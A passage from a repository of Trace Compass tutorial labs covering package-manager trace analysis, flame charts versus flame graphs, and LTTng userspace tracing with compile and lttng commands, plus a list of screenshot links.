kB/s) 59 | Selecting previously unselected package tree. 60 | (Reading database ... 275002 files and directories currently installed.) 61 | Preparing to unpack .../tree_1.7.0-5_amd64.deb ... 62 | Unpacking tree (1.7.0-5) ... 63 | Setting up tree (1.7.0-5) ... 64 | Processing triggers for man-db (2.8.4-2+b1) ... 65 | ``` 66 | 67 | Since we're interested in a single process, the `Control Flow` view would be the first place to look for it. Let's first find it, by pressing `ctrl-f` with focus on the view. A search dialog will appear and enter `apt`, then click *Finish* or press `Enter`. The view should focus on the first entry with that name, which should be our process. 68 | 69 | We notice the process has quite a few children processes and threads. The main thread is often in the blocked state, waiting for some other event to complete. 70 | 71 | To understand the intricacies of the relation between the threads/processes and see what it's waiting on, let's do the critical path of our main process: Open the `Critical Flow` view, right-click on the `apt` process in the `Control Flow` view and click `Follow apt`. 72 | 73 | Now let's try to identify the various phases of the process. Once we identify a phase with more or less precision, we can bookmark it in the view. First, we need to select the time range to bookmark, then click on the *Add bookmark...* icon (the little flag with a + sign). This will open the *Add Bookmark* dialog, where you can enter a short description (the name of the phase) and the color for this bookmark. 74 | 75 | ![AddBookmark](screenshots/addBookmark.png "Add Bookmark") 76 | 77 | We can then easily come back to a bookmark by selecting it in any view that supports bookmarks. It will automatically select the proper time range and the status bar at the bottom will show the duration of the phase. 78 | 79 | ``` 80 | **Spoiler alert: you may pause here and look at the trace for yourself** 81 | ``` 82 | 83 | Looking at the critical path, we see a zone where it waits for the network. That must be the *Download*, that we can bookmark. Which would make the time before, the *preparation* phase. 84 | 85 | Beyond that, we see at some point, it depends on processes called `dpkg-preconfig` and `apt-extracttemp`, which suggest it is part of the *Unpacking preparation and Unpacking* phases. 86 | 87 | After that, there quite a few timers. That doesn't say much, but looking at the `Control Flow` view during those timers, it appears some other `dpkg` processes were running. Let's look at their own critical paths to see if we can get more information. 88 | 89 | The first of those processes (process 2743) shows a lot of disk writes and calls to `dpkg-deb`. That would be the installation phase. 90 | 91 | The second of those timer phases (process 2753) spawns quite a lot of `mandb` processes, which we could link directly to the *Processing triggers for man-db* from the output. 92 | 93 | ![AptResults](screenshots/apt.png "Apt-Get Results") 94 | 95 | - - - 96 | 97 | ### Task 3: Observe yum 98 | 99 | Let's look at the `yum` trace. The command to obtain it is as follows: 100 | 101 | ``` 102 | $ sudo yum install -y tree 103 | Last metadata expiration check: 0:00:00 ago on Wed 17 Oct 2018 09:42:08 AM EDT. 104 | Dependencies resolved. 105 | ============================================================================ 106 | Package Arch Version Repository Size 107 | ============================================================================ 108 | Installing: 109 | tree x86_64 1.7.0-11.fc27 fedora 56 k 110 | 111 | Transaction Summary 112 | ============================================================================ 113 | Install 1 Package 114 | 115 | Total download size: 56 k 116 | Installed size: 97 k 117 | Downloading Packages: 118 | tree-1.7.0-11.fc27.x86_64.rpm 330 kB/s | 56 kB 00:00 119 | ---------------------------------------------------------------------------- 120 | Total 87 kB/s | 56 kB 00:00 121 | Running transaction check 122 | Transaction check succeeded. 123 | Running transaction test 124 | Transaction test succeeded. 125 | Running transaction 126 | Preparing : 1/1 127 | Installing : tree-1.7.0-11.fc27.x86_64 1/1 128 | Running scriptlet: tree-1.7.0-11.fc27.x86_64 1/1 129 | Running as unit: run-ra9b2233c777f47a29fb7df77c22db178.service 130 | Verifying : tree-1.7.0-11.fc27.x86_64 1/1 131 | 132 | Installed: 133 | tree.x86_64 1.7.0-11.fc27 134 | ``` 135 | 136 | ``` 137 | Spoiler alert: you may pause here and look at the trace for yourself 138 | ``` 139 | 140 | We observe that `yum` starts very few side threads, most of the work is done in the main thread. The critical path shows the obvious download phase, when it waits for the network. It is preceded by a long period of timers. During that timer phase, another `yum` thread was alive and blocked. Let's look at it its critical path. What was it waiting for: the network! That leads us to think this timer phase is also part of the download phase. 141 | 142 | It's then easy to deduce the preceding phase is the preparation: resolving dependencies, showing the installation details, etc. 143 | 144 | As for what comes after, the phases cannot be clearly identified. The disk is being touched at various locations during that time, nothing obvious. How could we find out more about this process? We are going to install the `tree` package, so chances are files with names containing *tree* will be opened by the process. We will look for *open* system calls on the `yum` process. 145 | 146 | With the events table, let's first add search on *open* in the *Event type* column and *16874* in the *PID* column. We can then convert this search to a filter, to see only the events with those fields, by clicking on the *Add as filter* button, or pressing `Ctrl-enter`. We have all the *open* events for this process. The *Contents* column shows the filename along with the open event. 147 | 148 | ![SearchEventTableOpened](screenshots/searchEventTableOpened.png "Yum Search Opened Files") 149 | 150 | Let's select a time right after the download phase and search for *tree* in the *Contents* column. When one event is found, pressing `Enter` will move to the next event. The rpm package file is opened quite a few times, at some point, we see the `/usr/bin/tree` file being opened. 151 | 152 | ![SearchEventTableTree](screenshots/searchEventTableTree.png "Yum Search Tree Files") 153 | 154 | So we identified more or less the location of the *Installation* phase, which would make the previous and following phases the *Unpack, check and test* and *Post* (running scriptlet and verification) phases. 155 | 156 | ![YumResults](screenshots/yum.png "Yum Results") 157 | 158 | - - - 159 | 160 | ### Task 4: Observe pacman 161 | 162 | Now let's look at the `pacman` trace. It was obtained through the following command: 163 | 164 | ``` 165 | $ sudo pacman -S --noconfirm tree 166 | resolving dependencies... 167 | looking for conflicting packages... 168 | 169 | Packages (1) tree-1.7.0-2 170 | 171 | Total Download Size: 0.03 MiB 172 | Total Installed Size: 0.09 MiB 173 | 174 | :: Proceed with installation? [Y/n] 175 | :: Retrieving packages... 176 | tree-1.7.0-2-x86_64 29.0 KiB 2.18M/s 00:00 [###################] 100% 177 | (1/1) checking keys in keyring [###################] 100% 178 | (1/1) checking package integrity [###################] 100% 179 | (1/1) loading package files [###################] 100% 180 | (1/1) checking for file conflicts [###################] 100% 181 | (1/1) checking available disk space [###################] 100% 182 | :: Processing package changes... 183 | (1/1) installing tree [###################] 100% 184 | :: Running post-transaction hooks... 185 | (1/1) Arming ConditionNeedsUpdate... 186 | ``` 187 | 188 | ``` 189 | Spoiler alert: you may pause here and look at the trace for yourself 190 | ``` 191 | 192 | We observe that `pacman` starts a few threads, some of which are related with `gpg`. The critical path again shows the obvious download phase, waiting for the network. Like `yum` it is preceded by a long period of timers, with another thread being blocked. Let's look at its critical path to see if it is also waiting for network like `yum`'s. Indeed, the other blocked thread is waiting for network, maybe resolving the address to get the package, so that too is part of the download phase. 193 | 194 | As for what comes after the download, the dependencies on `gpg` processes shows the phase that corresponds to *checking keys in keyring*, the `ldconfig` is probably part of the *Processing package changes...*. The part with disk writes is the *installing tree* part and the rest would be the *Running post-transaction hooks...* part. 195 | 196 | ![PacmanResults](screenshots/pacman.png "Pacman Results") 197 | 198 | - - - 199 | 200 | ### Task 5: Observe zypper 201 | 202 | Now let's look at the `zypper` trace. It was obtained through the following command: 203 | 204 | ``` 205 | $ sudo zypper install tree 206 | Retrieving repository 'monitoring' metadata ...............................[done] 207 | Building repository 'monitoring' cache.....................................[done] 208 | Retrieving repository 'openSUSE-Leap-15.0-Update' metadata.................[done] 209 | Building repository 'openSUSE-Leap-15.0-Update' cache......................[done] 210 | Loading repository data... 211 | Reading installed packages... 212 | Resolving package dependencies... 213 | 214 | The following NEW package is going to be installed: 215 | tree 216 | 217 | 1 new package to install. 218 | Overall download size: 55.8 KiB. Already cached: 0 B. After the operation, additional 109.8 KiB will be used. 219 | Retrieving package tree-1.7.0-lp150.1.8.x86_64 (1/1), 55.8 KiB (109.8 KiB unpacked) 220 | Retrieving: tree-1.7.0-lp150.1.8.x86_64.rpm................................[done (3.6 KiB/s)] 221 | Checking for file conflicts:...............................................[done] 222 | (1/1) Installing: tree-1.7.0-lp150.1.8.x86_64..............................[done] 223 | ``` 224 | 225 | ``` 226 | Spoiler alert: you may pause here and look at the trace for yourself 227 | ``` 228 | 229 | We observe that `zypper` spawns a few threads, all named `zypper`. The critical path again shows the obvious download phase, waiting for the network. 230 | 231 | Before that, the main process is running, but preceded by a long timer period. But unlike `yum` and `pacman`, we do not see any other of the `zypper` thread running concurrently. Let's zoom in that time range and see if anything else was running at that time. We can look in the `Resources` view, which does not show a particularly high CPU usage. We could also take a look at the `Cpu Usage` view and sort by % of utilization to see which threads were more active during that period. There's nothing related to `zypper`, so it must have been waiting for something that didn't happen. Maybe a timeout for network? Or did the user not put the `-n` option and it was waiting on user input before installing? Let's tag this phase as the *preparation* phase. 232 | 233 | Now looking at what comes after the download phase, we can look for disk accesses to identify the *install* phase We can get help by looking for the `/usr/bin/tree` file in the *Contents* column of the `Events table`, like we did for `yum`. That phase looks very short and involves the `rpm` process. 234 | 235 | ![ZypperResults](screenshots/zypper.png "Zypper Results") 236 | 237 | - - - 238 | 239 | ### Conclusion 240 | 241 | We have observed the behaviors of a few different package managers with TraceCompass. This lab is not about comparing them, as the traces were obtained on different machines, with varying specs. But it allowed us to dig in trace's data to identify various zones of interest in a trace, without knowing about the application's internals, or even having the source code of the app! 242 | 243 | - - - 244 | 245 | #### Next 246 | 247 | * [Userspace Tracing With LTTng](../201-lttng-userspace-tracing) 248 | or 249 | * [Back](../) for more options 250 | -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/addBookmark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/addBookmark.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/apt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/apt.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/importArchive.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/importArchive.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/pacman.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/pacman.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/searchEventTableOpened.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/searchEventTableOpened.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/searchEventTableTree.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/searchEventTableTree.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/yum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/yum.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/zypper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/zypper.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/FlameChartsVsFlameGraphs.md: -------------------------------------------------------------------------------- 1 | ## Flame Charts vs Flame Graphs 2 | 3 | This is a concept that has been explained to me way too many times until I understood it. 4 | 5 | The difference is quite simple in terms of the data model. 6 | 7 | A **Flame Chart** shows the callstack status vs time. So its model is a stack. The Trace Compass implementation was formerly called the callstack view, it supports showing the callstack status vs time as well as arrows that should represent forks, joins or interprocess communication. This is left up to the extender. 8 | 9 | A **Flame Graph** shows the aggregated callstack time taken. Its model is a weighted tree. A **call tree view** shares the model with a flame graph. A **Flame Graph** decorates it differently. A traditional **Flame Graph** will show colors going from yellow to orange to red, like flames. Trace Compass takes a novel twist on this, the colors are the same as the **Flame Chart**. As Trace Compass provides both a **Flame Chart** and a **Flame Graph**, keeping the colors the same helps users associate one color to a function/method/span. 10 | 11 | TL;DR: **Flame Charts** show data vs wall clock, **Flame Graphs** aggregate that into a report. 12 | 13 | - - - 14 | 15 | ### Comparison of Flame Chart and Flame Graph Tooltips 16 | 17 | #### Flame Chart 18 | | key |value | 19 | |---|---| 20 | | Thread | Thread name | 21 | |Start time | time| 22 | |End time | time| 23 | |Duration : ... | duration | 24 | | % of time selection: ... | percentage | 25 | 26 | #### Flame Graph 27 | | key |value | 28 | |---|---| 29 | | Depth | # | 30 | |Number of calls | #| 31 | |Durations | | 32 | | total duration | duration | 33 | |Avg duration| duration| 34 | |Min duration| duration| 35 | |Max duration| duration| 36 | |Standard Deviation| duration| 37 | |Total time| duration| 38 | |Self times|| 39 | | total duration | duration | 40 | |Avg duration| duration| 41 | |Min duration| duration| 42 | |Max duration| duration| 43 | |Standard Deviation| duration| 44 | |Total time| duration| 45 | 46 | **Flame graphs** have no absolute time reference 47 | 48 | - - - 49 | 50 | ### When to use Flame Charts and Flame Graphs 51 | 52 | **Flame Graphs** show an executive summary of where time is spent in a trace. This is useful to know which functions can be easily optimized. It can also highlight when a function is called too often. It does not show the sequence of events though, nor will it show spurious slowdowns. **Flame Charts** are very useful to gain intimate knowledge of the flow of a program. If a function takes too long in the **Flame Graph**, the next logical step would be to investigate its behaviour in the **Flame Chart**. To do this, one feature that may help in Trace Compass is to right click on an element of the **Flame Graph** and through the context menu go to the Min/Max duration. 53 | 54 | - - - 55 | 56 | ### Conclusion 57 | 58 | **Flame Charts** and **Flame Graphs** are powerful tools that can work well together. The naming and slightly overlapping functionality make them difficult to grasp for new users, but they should be tools in the belts of every performance engineer. As long as one can derive a **Flame Chart** one can extract a **Flame Graph**, the converse is however false. 59 | -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/README.md: -------------------------------------------------------------------------------- 1 | ## LTTng Userspace Tracing 2 | 3 | In this lab, you will learn to compile for tracing and analyze C/C++ programs, using LTTng UST. We will see the various analyzes available with the builtin lttng userspace libraries. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. Have git, lttng and the Generic Callstack add-on on Trace Compass installed. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. 6 | 7 | - - - 8 | 9 | ### Task 1: Compiling and tracing `ls` from coreutils 10 | 11 | In this lab you will use the coreutils package to compile and trace the `ls` command. In order to do that we need the source code for this package which can be download with git: 12 | 13 | ```bash 14 | $ git clone git://git.sv.gnu.org/coreutils 15 | ``` 16 | 17 | Then you will need to compile `ls` with the proper flags by running these commands in coreutils/: 18 | 19 | ```bash 20 | $ ./bootstrap 21 | $ ./configure CFLAGS="-g -O2 -finstrument-functions" 22 | $ make 23 | ``` 24 | 25 | [clang](https://linux.die.net/man/1/clang) and [gcc](https://linux.die.net/man/1/gcc) have the flag `-finstrument-functions` which generates instrumentation calls for function entry and exit. A more detailed explanation can be found [here](https://lttng.org/docs/v2.10/#doc-liblttng-ust-cyg-profile). Then after compiling coreutils the `ls` executable is located in `coreutils/src/`. 26 | 27 | You can generate the trace using the following command in the `coreutils/` directory: 28 | 29 | ```bash 30 | $ lttng-record-trace -p cyg_profile,libc ./src/ls -l 31 | ``` 32 | 33 | or to manually create the trace, the following commands can be run 34 | ```bash 35 | $ lttng create 36 | $ lttng enable-channel u -u --subbuf-size 1024K --num-subbuf 8 37 | $ lttng enable-event -c u -u lttng_ust_cyg_profile*,lttng_ust_statedump* 38 | $ lttng add-context -c u -u -t vpid -t vtid 39 | $ lttng start 40 | $ LD_PRELOAD="liblttng-ust-cyg-profile.so liblttng-ust-libc-wrapper.so" ./src/ls -l 41 | $ lttng destroy 42 | ``` 43 | 44 | These tracing commands will trace 2 types of events: 45 | 46 | * The function entry/exits because the program was compiled with the proper instrumentation and the `liglttng-ust-cyg-profile.so` library was LD_PRELOADed. 47 | * The libc function calls, like calloc, malloc and free, done by the application, simply by LD_PRELOADing the `liblttng-ust-libc-wrapper.so` library. 48 | 49 | - - - 50 | 51 | ### Task 2: Visualizing cyg profile traces 52 | 53 | In the previous task, you generated a trace of the `ls` command that contains all the function calls. You can open this trace on Trace Compass and you should see in the *Project Explorer View*, under Views, the *LTTng-UST CallStack* tree view. Under this, four views are present: 54 | 55 | * The *Flame Chart View* shows the state of the stack at all moments during the trace. That view shows for all threads of the application, the functions that were called, so it's easy to see who called who and when. If you do not see human-readable names for the functions, see the next section of this lab. 56 | 57 | ![FlameChart](screenshots/flameChart.png "Trace Compass Flame Chart View") 58 | 59 | * The *Flame Graph View* looks similar to the *Flame Chart View* but it is different. Each box represents a function in the stack but the horizontal axis show the total aggregated duration of all calls to this function at a particular level. A more complete explanation is available [here](http://www.brendangregg.com/FlameGraphs/cpuflamegraphs.html#Description). 60 | 61 | ![FlameGraph](screenshots/flameGraph.png "Trace Compass Flame Graph View") 62 | 63 | `For a more complete understanding of the difference between Flame Charts and Flame Graphs`, see [this additional document](FlameChartsVsFlameGraphs.md) 64 | 65 | * The *Function Durations Distribution View* is a bar graph that shows the number of function calls with respect to their duration. The count is using a logarithmic scale. In this example it shows that very few functions takes longer than 0.5 seconds. 66 | 67 | ![FunctionDurationDistribution](screenshots/functionDurationDistribution.png "Trace Compass Function Duration Distribution View") 68 | 69 | * The *Function Duration Statistics View* is a table with each function's minimum, maximum, average duration and other statistical parameters that may show that in certain cases, the duration can be bigger or lower depending on the context. In this case `print_dir` can take a long time to execute depending on the size of the directory. 70 | 71 | ![FunctionDurationStatistics](screenshots/functionDurationStatistics.png "Trace Compass Function Duration Statistics View") 72 | 73 | - - - 74 | 75 | ### Task 3: Understanding the symbols 76 | 77 | The events used to populate this view are lttng_ust_cyg_profile[\_fast]:func_entry and lttng_ust_cyg_profile[\_fast]:func_exit. In the events fields, there's the 'addr' field that is used to identify the function being called. Depending on which machine you are now viewing this trace, the one where the trace was taken or not, the flame chart view will display the human readable name of the function or the cryptic 'addr' field. 78 | 79 | ![CygProfileEntryExit](screenshots/entryExitEvents.png "Trace Compass Cyg-profile Entry Exit Events") 80 | 81 | If Trace Compass is running on the machine where the trace was taken (the target), you should see the function names directly. That's because you also recorded the ``lttng_ust_statedump:*`` events. Some of them contain the absolute path to the binary files. So if those files are available, there will be automatic source lookup of the symbols and translation to the human readable name of the function. 82 | 83 | ![StateDumpBinInfo](screenshots/statedumpBinInfo.png "Trace Compass Statedump bin_info Events") 84 | 85 | If you are not running Trace Compass on the machine where the trace was taken, chances are the binary files being traced is not present at the path in the events, or else it is, but it's not exactly the same version, so symbols will not be right. In those cases, you need to configure how to resolve the symbols. To do this, you can right-click on the trace and select `Configure symbols` from the menu, or click on the symbol configuration icon in the views. 86 | 87 | ![ConfigureSymbols](screenshots/configureSymbols.png "Trace Compass Configure Symbols") 88 | 89 | You have several options. For automatic source lookup, you can set the root directory under which the files from the target are located. The directory specified should contain full directory structure of the target, so let's say a file being trace is `/usr/local/bin/ls`, and the target root directory is `/home/me/target`, it is expected there will be a file `/home/me/target/usr/local/bin/ls`. This is a typical case for embedded system where the target OS was compiled on another machine and sent to the target. 90 | 91 | ![SymbolRootDirectory](screenshots/configureSymbolsRootDirectory.png "Trace Compass Configure Symbols For Binary Source Lookup") 92 | 93 | If you do not have the full file system of the target, you can just add the files containing the symbol resolution. They can be either 94 | 95 | * the binary that was used for taking the trace. 96 | * a file generated from the binary using `nm myprogram > mapping.txt`. If you are dealing with C++ executables, you may want to use `nm --demangle` instead to get readable function names. 97 | 98 | ![SymbolRootDirectory](screenshots/configureSymbolsNameMapping.png "Trace Compass Configure Symbols Name Mapping") 99 | 100 | For this lab, if you did not produce the trace yourself on the machine used for viewing, you can add the executable file provided in the `traces/` directory. 101 | 102 | - - - 103 | 104 | ### Task 4: Memory usage 105 | 106 | The trace was recorded using the lttng-ust libc wrapper, to trace calls to libc functions for memory allocation/deallocation. With the trace opened in Trace Compass, under *Views*, you may expand the *Ust Memory* analysis and see the views for this analysis. 107 | 108 | * The *UST Memory Usage* views shows in time when the memory was allocated and freed, per thread. The UST memory view can show the memory usage of an application as it executes, when more memory was needed, when it was freed. In conjunction with the *Callstack* analysis views, it can be used to see more greedy code paths. 109 | 110 | ![UstMemoryUsage](screenshots/ustMemoryUsage.png "Trace Compass UST Memory Usage View") 111 | 112 | * The *Potential Leaks* view shows the memory that was allocated during the trace but not freed. This could be totally normal if the trace does not span the whole lifetime of a process/thread, or it can be some still reachable memory that does not pose a leak. 113 | 114 | ![UstMemoryPotentialLeaks](screenshots/ustMemoryPotentialLeaks.png "Trace Compass UST Memory Potential Leaks View") 115 | 116 | * The *Potential Leaks vs time* view shows the same information as the *Potential Leaks* view, but as a scatter chart, so it's possible to visually see in time when exactly the memory was allocated. 117 | 118 | *Note* The potential leaks views are not meant to detect real memory leak. For that, tools like [Valgrind](http://valgrind.org/) are better suited and will tell you the exact line of code where the leak happened. But sometimes, knowing where the leaked memory was allocated does not help with the why it was not freed. In those cases, seeing it here with the full execution trace (callstacks, path to/from allocation), can help better put it in context. Also, adding a kernel trace to it, could add information, for instance show a failed system call around that time which may give a hint as to why it was not deallocated. 119 | 120 | - - - 121 | 122 | ### Task 5: Tracing Userspace and Kernel 123 | 124 | Even better than tracing userspace only is to observe both a userspace and kernel space traces together! You can skip to the next task if you are using the traces provided by this tutorial. 125 | 126 | To trace both kernel and userspace, once you have compiled an application with the `-finstrument-functions` flag, you can do one of the following 127 | 128 | ```bash 129 | $ lttng-record-trace -p cyg_profile,libc,kernel 130 | ``` 131 | 132 | or to manually create the trace: 133 | ```bash 134 | $ lttng create 135 | $ lttng enable-event -u lttng_ust_cyg_profile*,lttng_ust_statedump* 136 | $ lttng enable-event -k sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup,\ 137 | irq_softirq_entry,irq_softirq_raise,irq_softirq_exit,irq_handler_entry,irq_handler_exit,\ 138 | lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,\ 139 | block_rq_complete,block_rq_insert,block_rq_issue,\ 140 | block_bio_frontmerge,sched_migrate,sched_migrate_task,power_cpu_frequency,\ 141 | net_dev_queue,netif_receive_skb,net_if_receive_skb,\ 142 | timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 143 | $ lttng enable-event -k --syscall --all 144 | $ lttng start 145 | $ LD_PRELOAD="liblttng-ust-cyg-profile.so liblttng-ust-libc-wrapper.so" 146 | $ lttng destroy 147 | ``` 148 | 149 | Notice that unlike the commands above for tracing userspace application only, we do not need the `vtid` and `vpid` contexts, as the kernel trace will provide this information. 150 | 151 | You may now import the traces in Trace Compass. 152 | 153 | - - - 154 | 155 | ### Task 6: 156 | 157 | In the `network-experiment`, we traced `wget` instrumented with `-finstrument-functions`, as well as the kernel. Let's open those 2 traces in an *experiment*, ie multiple traces opened as one, all events together. First, select the `clientKernel` and `clientUst` traces under the `network-experiment` folder. Right-click on the selected traces, then select `Open As Experiment...` -> `Generic Experiment`. It will create an experiment under the `Experiments` folder and open it. 158 | 159 | ![OpenKernelUstExperiment](screenshots/openKernelUstExperiment.png "Open As Experiment") 160 | 161 | The kernel views like `Control Flow` and `Resources` will get populated, as well as the userspace views described above. 162 | 163 | To have a more direct view of the `Flame Chart` with the kernel, if you have installed the `Generic Callstack (Incubator)` add-ons (explained in the "[Installing TraceCompass](../006-installing-tracecompass/)" labs), you can expand the `Experiment` folder, `Experiment`, `Views`, `LTTng-UST Callstack (Incubator)` and double-click on the `Flame Chart (incubator)` and the `Flame Graph (incubator)` views. 164 | 165 | ![IncubatorFlameViews](screenshots/incubatorFlameViews.png "Open Incubator Flame Views") 166 | 167 | To resolve the symbols properly, you need to add the `wget` executable, located in the `traces` folder of this labs to the `Configure Symbols...` menu, in the tab title `GNU nm - [...]/clientUst` as shown below 168 | 169 | ![UstKernelConfigureSymbols](screenshots/ustKernelConfigureSymbols.png "Userspace Kernel Configure Symbols") 170 | 171 | In the `Flame Chart (incubator)` view, below the callstack lines, we see a line showing the `Kernel Statuses`. That line is the same as the one from the `Control Flow` view, but is more practical as it does not need the 2 views opened together. This allows to see that even though the `connect_with_timeout_callback` function appears to take a lot of time, the thread was actually blocked most of the time. 172 | 173 | ![UstKernelFlameChart](screenshots/ustKernelFlameChart.png "Userspace Kernel Flame Chart") 174 | 175 | By adding the kernel data to the userspace, we can compute the actual `CPU time` for each of the function. That information is available in the tooltip of the `Flame Graph (incubator)` view. So for the `connect_with_timeout_callback` function, we see that even though the total duration is 24 milliseconds, the actual CPU time of this function is only 76 microseconds. 176 | 177 | ![UstKernelFlameGraph](screenshots/ustKernelFlameGraph.png "Userspace Kernel Flame Graph") 178 | 179 | We can obtain the critical path for the observed threads directly from the `Flame Chart (incubator)` view. We just right-click on the thread entry on the left, named `9512` and select the `Follow 9512/9512`. 180 | 181 | ![UstKernelFollowThread](screenshots/ustKernelFollowThread.png "Userspace Kernel Follow Thread") 182 | 183 | This will show the critical path for this thread, which shows that the time during which we were blocked, it was waiting for the network, which is not surprising when tracing the `wget` process, but which can be very eye-opening for other applications. We also notice that the `main` function starts a few milliseconds after the process start. Looking at the rest of the critical path and the `Control Flow` view, we can observe the `lttng` preloading setup for this application taking place. 184 | 185 | ![UstKernelCriticalPath](screenshots/ustKernelCriticalPath.png "Userspace Kernel Critical Path") 186 | 187 | Other kernel and userspace views can be opened together to observe, for instance, disk utilization during the thread's execution (though it would not say if the disk utilization is due to this thread, more investigation is needed) or system's total CPU usage, or where in the thread some system calls were made, etc. This allows to dig deeper into the application's behavior and interaction with the system, with rather simple and automatic instrumentation. 188 | 189 | - - - 190 | 191 | ### Conclusion 192 | 193 | In the lab, you have compiled a program with tracing helpers, traced the `ls` command and saw the builtin views available for `LTTng UST` traces, ie the *LTTng-UST CallStack* and the *UST memory* views, as well as how we can leverage the userspace data with a system trace. You should now be able to analyze the execution of an application in details in terms of memory usage and function calls. 194 | 195 | - - - 196 | 197 | #### Next 198 | 199 | * [Exercice: Bug Hunt](../202-bug-hunt) 200 | or 201 | * [Back](../) for more options 202 | -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/executables/ls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/executables/ls -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/executables/wget: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/executables/wget -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbols.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbolsNameMapping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbolsNameMapping.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbolsRootDirectory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbolsRootDirectory.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/entryExitEvents.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/entryExitEvents.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/flameChart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/flameChart.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/flameGraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/flameGraph.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/functionDurationDistribution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/functionDurationDistribution.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/functionDurationStatistics.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/functionDurationStatistics.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/incubatorFlameViews.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/incubatorFlameViews.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/openKernelUstExperiment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/openKernelUstExperiment.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/statedumpBinInfo.png: -------------------------------------------------------------------------------- 